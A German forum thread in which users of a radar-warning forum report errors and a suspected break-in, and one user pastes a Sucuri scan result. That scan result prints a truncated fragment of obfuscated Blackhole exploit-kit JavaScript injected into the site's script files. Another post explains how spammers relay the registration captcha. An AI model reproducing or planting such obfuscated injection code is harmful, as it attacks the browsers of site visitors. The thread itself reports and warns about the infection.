Jump to content

Recommended Posts

Posted (edited)

Mit dem Inetexplorer kommt am oberen Rand eine Fehlermeldung. Allerdings kann man das Forum dennoch nutzen.

 

Warning: Cannot modify header information - headers already sent by (output started at /kunden/266146_22047/www.radarforum.de/httpdocs/forum/index.php(1) : eval()'d code:6) in /kunden/266146_22047/www.radarforum.de/httpdocs/forum/admin/sources/classes/output/formats/html/htmlOutput.php on line 114

 

Warning: Cannot modify header information - headers already sent by (output started at /kunden/266146_22047/www.radarforum.de/httpdocs/forum/index.php(1) : eval()'d code:6) in /kunden/266146_22047/www.radarforum.de/httpdocs/forum/admin/sources/classes/output/formats/html/htmlOutput.php on line 127

Edited by Gast225
Posted

Ich kann den Fehler reproduzieren, habe aber noch keine Lösung. Das Sicherheitsupdate habe ich bereits eingespielt. Ich vermute es sind Reste von einem Einbruchsversuch. Werde spätestens am Montag ein Update auf eine neuere Version machen.

Posted

Das sind Bots die Foren auf Schwachstellen automatisiert untersuchen und Schadcode unterschieben. Da unser Admin Bereich gesondert geschützt ist, klappte der Einbruch nur zu 50%.

Posted

Die Spambots greifen auch wieder vermehrt an, kann man da nicht auch was machen? Uebrigens scheint mir hier im Antwortfenster auch einiges veraendert, die Smileys z. Bsp. werden nicht mehr offeriert, eigentlich gar keine Formatierung......

Posted
die Smileys z. Bsp. werden nicht mehr offeriert, eigentlich gar keine Formatierung......

Versuch mal den Button ganz oben links im Antwortfeld... dann müsste es wieder gehen (hatte ich auch schon ein- oder zweimal).

Posted

@QTreiberin: welchen Button ganz links im Antwortfeld? Bei mir hat sich auch die Schrift verändert und die Formatierung funktioniert auch nicht so, wie es sollte.

 

LG!

 

Eribär

Posted

Wenn Du unten das Antwortfeld anklickst kommen doch ganz viele Buttons. Wenn Du ganz oben links die Maus über den Button (der über dem "B" für Fettschrift) hältst erscheint "Bearbeitungsmodus ändern". Den anklicken und die anderen Buttons sind nicht mehr grau unterlegt und funktionieren wieder.

Posted

Danke! Bei Kugel Chrome funktioniert es, beim IE Vers. 9 nicht. Seltsam.....

 

LG!

Eribär

 

Versuch mal mit F12 einen anderen IE-Modus bzw. Seitenstandard.

Posted

Die Spambots greifen auch wieder vermehrt an, kann man da nicht auch was machen?

 

Wie schlimm ist es denn?

 

Ja, man da was machen. Eine Schwachstelle dieses Forums ist die Gültigkeitsdauer des auf der Registrierungseite verwendeten Captchas.

 

Spammer leiten das Bild des "Sicherheitscodes" um auf eine eigene Seite. Dort können Besucher z.B. Bilder für Erwachsene gratis anschauen. Um die Seite zu betreten, muss der Besucher das Captcha (z.B. des Radarforums) lösen. Für einen Menschen kein Problem. Mit diesen Information kann der Spammerbot einen neuen Account anlegen und Beiträge automatisiert erstellen. Es soll auch Menschen geben, die mit dem Lösen von Captchas Geld verdienen und einene entsprechenden Service anbieten.

 

 

Das Captcha sollte nur für eine kuze Zeit gültig sein !!!

Eine Reload der Reg.Seite nach 1 min wäre z.B. eine billige Lösung, wenn auch sehr unschön.

Posted

Waren hier vor kurzem sogar mal gepostet... mit einer "Einladung" an alle RF-User sich über einen Link davon noch mehr anzugucken... :shutup:

 

Das Problem war nur, manche "Mitwirkenden" auf den Bildern sahen noch nicht volljährig aus... :angry2:

Posted

Ich habe den Cache neu erstellt, evtl. ging da etwas schief. Die Bots manipulieren Webseiten um Trojaner zu verteilen. Besonders der IE ist dafür anfällig.

 

Die Spammer verschwinden, wenn sie keinen Erfolg haben. Sollte das bis Ende der Woche so bleiben, schau ich, was man tun kann.

Posted

Vielleicht kann mir jemand helfen? Verwende den IE9 und habe alles (Unmögliche) versucht, auch den Hinweis von @rponline (Danke trotzdem!).

 

Sehe überhaupt keine Smileys und meine Signatur ist auch nicht mehr da, obwohl in der Profilverwaltung aktiviert.

 

Danke im Voraus und LG!

 

Eribär Edit: die Signatur ist wieder da, aber wo sind die Smileys? und irgendwie klappt die Formatierung auch nicht...

Posted
Vielleicht kann mir jemand helfen?
Hast Du mal Deinen Cache geleert und alle Cookies gelöscht?

 

 

Wenn ja und es funktioniert trotzdem (noch) nicht.... nimm den Feuerfuchs... :)

Posted

Hast Du mal Deinen Cache geleert und alle Cookies gelöscht?

 

Ich habe den Cache geraucht und die Cookies gegessen,

Hat nix geholfen.

Vielleicht bringt mich das captcha weiter. Bezugsquellen ?

Ernsthaft: Ich hatte einen heftigen Intruderversuch auf meinen PC (Festplatte), als ich mich vorhin hier eingeloggt habe.

So habe ich die Norton Software noch nie rumflippen gesehen (Warnmeldungen).

Die Quelladresse war die IP des Forums.

Hatte mich dann ausgeloggt und wieder eingeloggt. Keine Probleme.

 

Gruss

snb

Posted
Ich habe den Cache geraucht und die Cookies gegessen,

Oh oh, wenn das man nicht Werte ergibt die Dich im schlimmsten Fall zu einer MPU zwingen... :whistling:

Du solltest vorsichtshalber jetzt 72 Stunden sämtliche Körperteile vom PC lassen um wieder ganz clean zu werden... :)

Posted

Securi SiteCheck (http://sitecheck.sucuri.net/) warnt derzeit vor radarforum.de

 

@all: Bitte vorübergehend Javascript deaktivieren oder diese Site nicht mehr ansurfen, bis das geklärt ist!

 

 

Free Website Malware ScannerSucuri SiteCheck Home

 

 

 

 

 

 

http://sitecheck.sucuri.net/images/warn2.png

web site: www.radarforum.de status: Site with warnings web trust: Not Blacklisted *This site was just scanned a few minutes ago.

 

Malware found on javascript file:

http://www.radarforum.de/forum/public/min/index.php?ipbv=35d5fd6b97fd186ba9889451654b8f4a&g=js

 

 

 

Known javascript malware.

Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole1?v36

<script>try{if(window.document)window["document"]["body"]="123"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["bo"+"dy"]="123"}catch(gfdnfdgber){m=123;if((alert+"").indexOf("na"+"ti"+"ve")!==-1)ev=window["eval"];}}

Malware found on javascript file:

http://www.radarforum.de/forum/public/min/index.php?ipbv=35d5fd6b97fd186ba9889451654b8f4a&charset=iso-8859-1&f=public/js/ipb.js,cache/lang_cache/2/ipb.lang.js,public/js/ips.hovercard.js,public/js/ips.quickpm.js,public/js/ips.board.js

 

We recommend you take immediate action to get your security issues remediated. Check out our service plans.

These scan results may be cached. Go ahead and rescan, it never hurts!

 

Scan Another Site

 

Enter a URL and the Sucuri SiteCheck scanner will check the site for malware, blacklisting status, and out-of-date software.

Disclaimer: Sucuri SiteCheck is a free & remote scanner. Although we do our best to provide the best results, 100% accuracy is not realistic, and not guaranteed.

 

Sucuri Plans

 

 

Popular

Power

 

 

5 Websites

$189.99 Yearly

Includes

  • Malware Cleanup (No page limit)
  • Website Integrity Monitoring
  • Email & Twitter Alerting
  • Manual Website Scanning
  • Blacklist Removal

Get Clean

 

Premium

 

 

1 Website

$89.99 Yearly

Includes

  • Malware Cleanup (No page limit)
  • Website Integrity Monitoring
  • Email & Twitter Alerting
  • Manual Website Scanning
  • Blacklist Removal

Get Clean

 

Need more? Check out more plans. Copyright © 2012, Sucuri LLC. All rights reserved.

Terms of Service | Privacy Policy Questions? 888.873.0817

Posted

An encoded javascript (or a redirection to it) was detected, leading browsers to the Blackhole Exploit kit (v1.x). It attempts to exploit the browser of anyone visiting the site using a combination of multiple vulnerabilities (Java, Adobe PDF, Flash and others). This is one of the most common type of malware we are seeing on web sites lately (2012/Mar).

Note that any PHP, JS or .htaccess could be compromised by this type of malware.

 

 

Quelle:

Securi Malware Labs

http://labs.sucuri.net/

Posted

Kurz gesagt: Die Website ist infiziert und es wird über Browsersicherheitslücken versucht schadhaften Code auf deinem Computer auszuführen.

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...